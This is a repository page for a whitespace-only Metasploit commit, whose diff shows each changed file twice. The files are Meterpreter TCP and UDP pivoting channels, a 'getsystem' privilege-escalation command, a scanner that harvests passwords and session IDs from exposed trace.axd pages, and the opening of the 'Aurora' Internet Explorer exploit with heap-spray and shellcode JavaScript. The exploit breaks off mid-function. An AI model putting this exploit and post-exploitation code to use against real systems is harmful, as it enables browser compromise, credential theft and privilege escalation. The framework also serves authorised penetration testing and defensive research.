dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

remove carriage returns 

git-svn-id: file:///home/svn/framework3/trunk@9140 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake 2010-04-26 18:29:24 +00:00
parent e3a1c63e98
commit a953c47cfb
9 changed files with 1699 additions and 1699 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

334
lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
View File

@ -1,167 +1,167 @@
require 'timeout'
require 'thread'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/channels/stream'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class TcpServerChannel < Rex::Post::Meterpreter::Channel
#
# This is a class variable to store all pending client tcp connections which have not been passed
# off via a call to the respective server tcp channels accept method. The dictionary key is the
# tcp server channel instance and the values held are an array of pending tcp client channels
# connected to the tcp server channel.
#
@@server_channels = {}
class << self
include Rex::Post::Meterpreter::InboundPacketHandler
#
# This is the request handler which is registerd to the respective meterpreter instance via
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
# received and store it in the respective tcp server channels list of new pending client channels.
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
#
def request_handler( client, packet )
if( packet.method == "tcp_channel_open" )
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( cid == nil or pid == nil )
return false
end
server_channel = client.find_channel( pid )
if( server_channel == nil )
return false
end
params = Rex::Socket::Parameters.from_hash(
{
'Proto' => 'tcp',
'LocalHost' => localhost,
'LocalPort' => localport,
'PeerHost' => peerhost,
'PeerPort' => peerport,
'Comm' => server_channel.client
}
)
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
client_channel.params = params
if( @@server_channels[server_channel] == nil )
@@server_channels[server_channel] = []
end
@@server_channels[server_channel] << client_channel
return true
end
return false
end
def cls
return CHANNEL_CLASS_STREAM
end
end
#
# Open a new tcp server channel on the remote end.
#
def TcpServerChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# add this instance to the class variables dictionary of tcp server channels
@@server_channels[self] = []
end
#
# Accept a new tcp client connection form this tcp server channel. This method does not block
# and returns nil if no new client connection is available.
#
def accept_nonblock
result = nil
if( @@server_channels[self].length > 0 )
channel = @@server_channels[self].shift
result = channel.lsock
end
return result
end
#
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
# if no timeout is specified.
#
def accept( opts={} )
timeout = opts['Timeout'] || -1
if( timeout == -1 )
result = _accept
else
begin
::Timeout.timeout( timeout ) {
result = _accept
}
rescue Timeout::Error
result = nil
end
end
return result
end
protected
def _accept
while( true )
if( @@server_channels[self].empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = accept_nonblock
break if result != nil
end
return result
end
end
end; end; end; end; end; end; end
require 'timeout'
require 'thread'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/channels/stream'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class TcpServerChannel < Rex::Post::Meterpreter::Channel
#
# This is a class variable to store all pending client tcp connections which have not been passed
# off via a call to the respective server tcp channels accept method. The dictionary key is the
# tcp server channel instance and the values held are an array of pending tcp client channels
# connected to the tcp server channel.
#
@@server_channels = {}
class << self
include Rex::Post::Meterpreter::InboundPacketHandler
#
# This is the request handler which is registerd to the respective meterpreter instance via
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
# received and store it in the respective tcp server channels list of new pending client channels.
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
#
def request_handler( client, packet )
if( packet.method == "tcp_channel_open" )
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( cid == nil or pid == nil )
return false
end
server_channel = client.find_channel( pid )
if( server_channel == nil )
return false
end
params = Rex::Socket::Parameters.from_hash(
{
'Proto' => 'tcp',
'LocalHost' => localhost,
'LocalPort' => localport,
'PeerHost' => peerhost,
'PeerPort' => peerport,
'Comm' => server_channel.client
}
)
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
client_channel.params = params
if( @@server_channels[server_channel] == nil )
@@server_channels[server_channel] = []
end
@@server_channels[server_channel] << client_channel
return true
end
return false
end
def cls
return CHANNEL_CLASS_STREAM
end
end
#
# Open a new tcp server channel on the remote end.
#
def TcpServerChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# add this instance to the class variables dictionary of tcp server channels
@@server_channels[self] = []
end
#
# Accept a new tcp client connection form this tcp server channel. This method does not block
# and returns nil if no new client connection is available.
#
def accept_nonblock
result = nil
if( @@server_channels[self].length > 0 )
channel = @@server_channels[self].shift
result = channel.lsock
end
return result
end
#
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
# if no timeout is specified.
#
def accept( opts={} )
timeout = opts['Timeout'] || -1
if( timeout == -1 )
result = _accept
else
begin
::Timeout.timeout( timeout ) {
result = _accept
}
rescue Timeout::Error
result = nil
end
end
return result
end
protected
def _accept
while( true )
if( @@server_channels[self].empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = accept_nonblock
break if result != nil
end
return result
end
end
end; end; end; end; end; end; end

384
lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
View File

@ -1,192 +1,192 @@
require 'timeout'
require 'rex/sync/thread_safe'
require 'rex/socket/udp'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class UdpChannel < Rex::Post::Meterpreter::Channel
#
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
#
include Rex::Socket::Udp
#
# We are a datagram channel.
#
class << self
def cls
return CHANNEL_CLASS_DATAGRAM
end
end
#
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
#
def UdpChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
},
{
'type' => TLV_TYPE_PEER_HOST,
'value' => params.peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => params.peerport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# the instance variable that holds all incoming datagrams.
@datagrams = []
end
#
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
#
def timed_read( length=65535, timeout=def_read_timeout )
result = ''
begin
Timeout.timeout( timeout ) {
while( true )
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = self.read( length )
break
end
}
rescue Timeout::Error
result = ''
end
return result
end
#
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
# datagrams which the remote end of this channel has received and are in the
# queue.
#
def recvfrom( length=65535, timeout=def_read_timeout )
result = nil
# force a timeout on the wait for an incoming datagram
begin
Timeout.timeout( timeout ) {
while( true )
# wait untill we have at least one datagram in the queue
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
# grab the oldest datagram we have received...
result = @datagrams.shift
# break as we have a result...
break
end
}
rescue Timeout::Error
result = nil
end
# if no result return nothing
if( result == nil )
return [ '', nil, nil ]
end
# get the data from this datagram
data = result[0]
# if its only a partial read of this datagram, slice it, loosing the remainder.
result[0] = data[0,length-1] if data.length > length
# return the result in the form [ data, host, port ]
return result
end
#
# Overwrite the low level sysread to read data off our datagram queue. Calls
# to read() will end up calling this.
#
def sysread( length )
result = self.recvfrom( length )
return result[0]
end
#
# Overwrite the low level syswrite to write data to the remote end of the channel.
# Calls to write() will end up calling this.
#
def syswrite( buf )
return _write( buf )
end
#
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
# remote peer host/port via the remote end of the channel.
#
def send( buf, flags, saddr )
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
addends = [
{
'type' => TLV_TYPE_PEER_HOST,
'value' => peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => peerport
}
]
return _write( buf, buf.length, addends )
end
#
# The channels direct io write handler for any incoming data from the remote end
# of the channel. We extract the data and peer host/port, and save this to a queue
# of incoming datagrams which are passed out via calls to self.recvfrom()
#
def dio_write_handler( packet, data )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( peerhost and peerport )
@datagrams << [ data, peerhost, peerport ]
return true
end
return false
end
end
end; end; end; end; end; end; end
require 'timeout'
require 'rex/sync/thread_safe'
require 'rex/socket/udp'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class UdpChannel < Rex::Post::Meterpreter::Channel
#
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
#
include Rex::Socket::Udp
#
# We are a datagram channel.
#
class << self
def cls
return CHANNEL_CLASS_DATAGRAM
end
end
#
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
#
def UdpChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
},
{
'type' => TLV_TYPE_PEER_HOST,
'value' => params.peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => params.peerport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# the instance variable that holds all incoming datagrams.
@datagrams = []
end
#
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
#
def timed_read( length=65535, timeout=def_read_timeout )
result = ''
begin
Timeout.timeout( timeout ) {
while( true )
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = self.read( length )
break
end
}
rescue Timeout::Error
result = ''
end
return result
end
#
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
# datagrams which the remote end of this channel has received and are in the
# queue.
#
def recvfrom( length=65535, timeout=def_read_timeout )
result = nil
# force a timeout on the wait for an incoming datagram
begin
Timeout.timeout( timeout ) {
while( true )
# wait untill we have at least one datagram in the queue
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
# grab the oldest datagram we have received...
result = @datagrams.shift
# break as we have a result...
break
end
}
rescue Timeout::Error
result = nil
end
# if no result return nothing
if( result == nil )
return [ '', nil, nil ]
end
# get the data from this datagram
data = result[0]
# if its only a partial read of this datagram, slice it, loosing the remainder.
result[0] = data[0,length-1] if data.length > length
# return the result in the form [ data, host, port ]
return result
end
#
# Overwrite the low level sysread to read data off our datagram queue. Calls
# to read() will end up calling this.
#
def sysread( length )
result = self.recvfrom( length )
return result[0]
end
#
# Overwrite the low level syswrite to write data to the remote end of the channel.
# Calls to write() will end up calling this.
#
def syswrite( buf )
return _write( buf )
end
#
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
# remote peer host/port via the remote end of the channel.
#
def send( buf, flags, saddr )
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
addends = [
{
'type' => TLV_TYPE_PEER_HOST,
'value' => peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => peerport
}
]
return _write( buf, buf.length, addends )
end
#
# The channels direct io write handler for any incoming data from the remote end
# of the channel. We extract the data and peer host/port, and save this to a queue
# of incoming datagrams which are passed out via calls to self.recvfrom()
#
def dio_write_handler( packet, data )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( peerhost and peerport )
@datagrams << [ data, peerhost, peerport ]
return true
end
return false
end
end
end; end; end; end; end; end; end

194
lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
View File

@ -1,98 +1,98 @@
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# The local privilege escalation portion of the extension.
#
###
class Console::CommandDispatcher::Priv::Elevate
Klass = Console::CommandDispatcher::Priv::Elevate
include Console::CommandDispatcher
ELEVATE_TECHNIQUE_NONE = -1
ELEVATE_TECHNIQUE_ANY = 0
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
"Service - Named Pipe Impersonation (In Memory/Admin)",
"Service - Named Pipe Impersonation (Dropper/Admin)",
"Service - Token Duplication (In Memory/Admin)",
"Exploit - KiTrap0D (In Memory/User)"
]
#
# List of supported commands.
#
def commands
{
"getsystem" => "Attempt to elevate your privilege to that of local system."
}
end
#
# Name for this dispatcher.
#
def name
"Priv: Elevate"
end
#
# Attempt to elevate the meterpreter to that of local system.
#
def cmd_getsystem( *args )
technique = ELEVATE_TECHNIQUE_ANY
desc = ""
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
getsystem_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
)
getsystem_opts.parse(args) { | opt, idx, val |
case opt
when "-h"
print_line( "Usage: getsystem [options]\n" )
print_line( "Attempt to elevate your privilege to that of local system." )
print_line( getsystem_opts.usage )
return
when "-t"
technique = val.to_i
end
}
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
print_error( "Technique '#{technique}' is out of range." );
return false;
end
result = client.priv.getsystem( technique )
# got system?
if result[0]
print_line( "...got system (via technique #{result[1]})." );
else
print_line( "...failed to get system." );
end
return result
end
end
end
end
end
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# The local privilege escalation portion of the extension.
#
###
class Console::CommandDispatcher::Priv::Elevate
Klass = Console::CommandDispatcher::Priv::Elevate
include Console::CommandDispatcher
ELEVATE_TECHNIQUE_NONE = -1
ELEVATE_TECHNIQUE_ANY = 0
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
"Service - Named Pipe Impersonation (In Memory/Admin)",
"Service - Named Pipe Impersonation (Dropper/Admin)",
"Service - Token Duplication (In Memory/Admin)",
"Exploit - KiTrap0D (In Memory/User)"
]
#
# List of supported commands.
#
def commands
{
"getsystem" => "Attempt to elevate your privilege to that of local system."
}
end
#
# Name for this dispatcher.
#
def name
"Priv: Elevate"
end
#
# Attempt to elevate the meterpreter to that of local system.
#
def cmd_getsystem( *args )
technique = ELEVATE_TECHNIQUE_ANY
desc = ""
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
getsystem_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
)
getsystem_opts.parse(args) { | opt, idx, val |
case opt
when "-h"
print_line( "Usage: getsystem [options]\n" )
print_line( "Attempt to elevate your privilege to that of local system." )
print_line( getsystem_opts.usage )
return
when "-t"
technique = val.to_i
end
}
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
print_error( "Technique '#{technique}' is out of range." );
return false;
end
result = client.priv.getsystem( technique )
# got system?
if result[0]
print_line( "...got system (via technique #{result[1]})." );
else
print_line( "...failed to get system." );
end
return result
end
end
end
end
end
end

240
modules/auxiliary/scanner/http/trace_axd.rb
View File

@ -1,121 +1,121 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanDir
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'HTTP trace.axd Content Scanner',
'Version' => '$Revision: 7605 $',
'Description' => 'Detect trace.axd files and analize its content',
'Author' => ['c4an'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
], self.class)
register_advanced_options(
[
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
], self.class)
end
def run_host(target_host)
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
begin
turl = tpath+'trace.axd'
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
report_note(
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => 'TRACE_AXD',
:data => "trace.axd"
)
if datastore['TRACE_DETAILS']
aregex = /Trace.axd\?id=\d/
result = res.body.scan(aregex).uniq
result.each do |u|
turl = tpath+u.to_s
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
]
print_status ("DETAIL: #{turl}")
reg_info.each do |reg|
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
str = result.to_s.chomp
if reg.to_s.include?"APPL_PHYSICAL_PATH"
print_status ("Physical Path: #{str}")
elsif reg.to_s.include?"UserId"
print_status ("User ID: #{str}")
elsif reg.to_s.include?"Password"
print_status ("Password: #{str}")
elsif reg.to_s.include?"AspFilterSessionId"
print_status ("Session ID: #{str}")
elsif reg.to_s.include?"LOCAL_ADDR"
print_status ("Local Address: #{str}")
elsif result.include?"Via"
print_status ("VIA: #{str}")
elsif reg.to_s.include?"ALL_RAW"
print_status ("Headers: #{str}")
end
end
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanDir
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'HTTP trace.axd Content Scanner',
'Version' => '$Revision: 7605 $',
'Description' => 'Detect trace.axd files and analize its content',
'Author' => ['c4an'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
], self.class)
register_advanced_options(
[
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
], self.class)
end
def run_host(target_host)
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
begin
turl = tpath+'trace.axd'
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
report_note(
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => 'TRACE_AXD',
:data => "trace.axd"
)
if datastore['TRACE_DETAILS']
aregex = /Trace.axd\?id=\d/
result = res.body.scan(aregex).uniq
result.each do |u|
turl = tpath+u.to_s
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
]
print_status ("DETAIL: #{turl}")
reg_info.each do |reg|
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
str = result.to_s.chomp
if reg.to_s.include?"APPL_PHYSICAL_PATH"
print_status ("Physical Path: #{str}")
elsif reg.to_s.include?"UserId"
print_status ("User ID: #{str}")
elsif reg.to_s.include?"Password"
print_status ("Password: #{str}")
elsif reg.to_s.include?"AspFilterSessionId"
print_status ("Session ID: #{str}")
elsif reg.to_s.include?"LOCAL_ADDR"
print_status ("Local Address: #{str}")
elsif result.include?"Via"
print_status ("VIA: #{str}")
elsif reg.to_s.include?"ALL_RAW"
print_status ("Headers: #{str}")
end
end
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end

316
modules/exploits/windows/browser/ms10_002_aurora.rb
View File

@ -1,161 +1,161 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published to the Wepawet
malware analysis site. The technique used by this module is currently identical
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown',
'hdm' # Metasploit port
],
'Version' => '$Revision$',
'References' =>
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published to the Wepawet
malware analysis site. The technique used by this module is currently identical
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
},
'License' => MSF_LICENSE,
'Author' =>
[
['MSB', 'MS10-002'],
['CVE', '2010-0249'],
['OSVDB', '61697'],
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
if (request.uri.match(/\.gif/i))
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { 'Content-Type' => 'image/gif' })
return
end
var_boom = rand_text_alpha(rand(100) + 1)
var_element = rand_text_alpha(rand(100) + 1)
var_event = rand_text_alpha(rand(100) + 1)
var_loaded = rand_text_alpha(rand(100) + 1)
var_loaded_arg = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_el_array = rand_text_alpha(rand(100) + 1)
bleh = rand_text_alpha(3);
var_grab_mem = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_span_id = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var #{var_element} = "COMMENT";
var #{var_el_array} = new Array();
for (i = 0; i < 1300; i++)
{
#{var_el_array}[i] = document.createElement(#{var_element});
#{var_el_array}[i].data = "#{bleh}";
}
var #{var_event} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}()
{
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_loaded}(#{var_loaded_arg})
{
#{var_boom}();
#{var_event} = document.createEventObject(#{var_loaded_arg});
document.getElementById("#{var_span_id}").innerHTML = "";
window.setInterval(#{var_grab_mem}, 50);
}
function #{var_grab_mem}()
{
